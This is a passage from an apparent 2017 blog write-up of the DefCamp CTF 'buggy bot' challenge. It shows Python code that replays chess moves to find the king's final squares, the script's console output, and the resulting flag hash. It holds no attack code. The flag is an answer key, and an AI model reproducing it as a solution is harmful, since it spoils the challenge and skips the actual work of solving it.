class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"c6-d6"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"e6-f6"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"f6-g6"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"g6-h6"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"h6-a7"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"a7-b7"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"b7-c7"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"c7-d7"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"e7-f7"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"f7-g7"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"g7-h7"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">row</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">board</span><span class="p">):</span> <span class="n">row_marker</span> <span class="o">=</span> <span class="mi">8</span><span class="o">-</span><span class="n">i</span> <span class="k">if</span> <span class="s">'K'</span> <span class="ow">in</span> <span class="n">row</span><span class="p">:</span> <span class="k">print</span> <span class="s">"Move: "</span> <span class="o">+</span> <span class="n">position</span> <span class="o">+</span> <span class="s">"({1}{0})"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">row_marker</span><span class="p">,</span> <span class="n">row_letters</span><span class="p">[</span><span class="n">row</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s">'K'</span><span class="p">)])</span> <span class="n">solution</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="s">"{1}{0}"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">row_letters</span><span class="p">[</span><span class="n">row</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s">'K'</span><span class="p">)],</span><span class="n">row_marker</span> <span class="p">))</span> <span class="c"># Print board if needed</span> <span class="c"># self.view.display(self.model.board)</span> <span class="k">def</span> <span class="nf">parse_move</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">move</span><span class="p">):</span> <span class="n">s</span><span class="p">,</span> <span class="n">d</span> <span class="o">=</span> <span class="n">move</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">"-"</span><span class="p">)</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">8</span><span class="o">-</span> <span class="nb">int</span><span class="p">(</span><span class="n">s</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="n">j</span> <span class="o">=</span> <span class="n">column_reference</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="n">s</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="n">start</span> <span class="o">=</span> <span class="n">BoardLocation</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">j</span><span class="p">)</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">8</span><span class="o">-</span> <span class="nb">int</span><span class="p">(</span><span class="n">d</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="n">j</span><span class="o">=</span> <span class="n">column_reference</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="n">d</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="n">destination</span> <span class="o">=</span> <span class="n">BoardLocation</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">j</span><span class="p">)</span> <span class="k">return</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="k">if</span> <span class="n">__name__</span><span class="o">==</span><span class="s">"__main__"</span><span class="p">:</span> <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="s">'12345678'</span><span class="p">:</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="s">'abcdefgh'</span><span class="p">:</span> <span class="n">king_moves</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="s">'e1-'</span> <span class="o">+</span> <span class="n">i</span> <span class="o">+</span> <span class="n">j</span><span class="p">)</span> <span class="n">dest</span> <span class="o">=</span> <span class="n">i</span><span class="o">+</span><span class="n">j</span> <span class="n">position</span> <span class="o">=</span> <span class="s">'e1-'</span> <span class="o">+</span> <span class="n">i</span> <span class="o">+</span> <span class="n">j</span> <span class="n">C</span> <span class="o">=</span> <span class="n">Controller</span><span class="p">()</span> <span class="n">C</span><span class="o">.</span><span class="n">run</span><span class="p">()</span> <span class="n">solution</span> <span class="o">=</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">solution</span><span class="p">)</span> <span class="n">out</span> <span class="o">=</span> <span class="s">''</span> <span class="k">for</span> <span class="n">position</span> <span class="ow">in</span> <span class="n">solution</span><span class="p">:</span> <span class="n">out</span> <span class="o">=</span> <span class="n">out</span> <span class="o">+</span> <span class="n">position</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="s">";"</span> <span class="k">print</span> <span class="n">out</span> </code></pre></div></div> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">abatchy@ubuntu:~/Desktop/tmp$</span> python a.py <span class="go">Move: e1-e1(d3) Move: e1-f1(d3) Move: e1-a2(d2) Move: e1-e2(d1) Move: e1-e3(d4) Move: e1-f3(d4) Move: e1-g3(d4) Move: e1-h3(d4) Move: e1-a4(d4) Move: e1-b4(d4) Move: e1-c4(d4) Move: e1-d4(d4) Move: e1-e4(d5) Move: e1-f4(d5) Move: e1-g4(d5) Move: e1-h4(d5) Move: e1-a5(d5) Move: e1-b5(d5) Move: e1-c5(d5) Move: e1-d5(d5) Move: e1-e5(d6) Move: e1-f5(d6) Move: e1-g5(d6) Move: e1-h5(d6) Move: e1-a6(d6) Move: e1-b6(d6) Move: e1-c6(d6) Move: e1-d6(d6) Move: e1-e6(d7) Move: e1-f6(d7) Move: e1-g6(d7) Move: e1-h6(d7) Move: e1-a7(d7) Move: e1-e7(h7) Move: e1-a8(a8) Move: e1-b8(b8) Move: e1-c8(c8) Move: e1-d8(d8) Move: e1-e8(e8) Move: e1-f8(f8) Move: e1-g8(g8) Move: e1-h8(h8) </span><span class="gp">d1;</span>d2<span class="p">;</span>d3<span class="p">;</span>d4<span class="p">;</span>d5<span class="p">;</span>d6<span class="p">;</span>d7<span class="p">;</span>h7<span class="p">;</span>a8<span class="p">;</span>b8<span class="p">;</span>c8<span class="p">;</span>d8<span class="p">;</span>e8<span class="p">;</span>f8<span class="p">;</span>g8<span class="p">;</span>h8 </code></pre></div></div> <p>The flag is <code class="highlighter-rouge">DCTF{sha256(positions)}</code> = <code class="highlighter-rouge">DCTF{1bdd0a4382410d33cd0a0bf0e8193345babc608ea0ddd83dccbcb4763d67c67b}</code>.</p> <p>- Abatchy</p> Sun, 01 Oct 2017 11:00:00 +0000 http://abatchy17.github.io/2017/10/defcamp-buggy-bot http://abatchy17.github.io/2017/10/defcamp-buggy-bot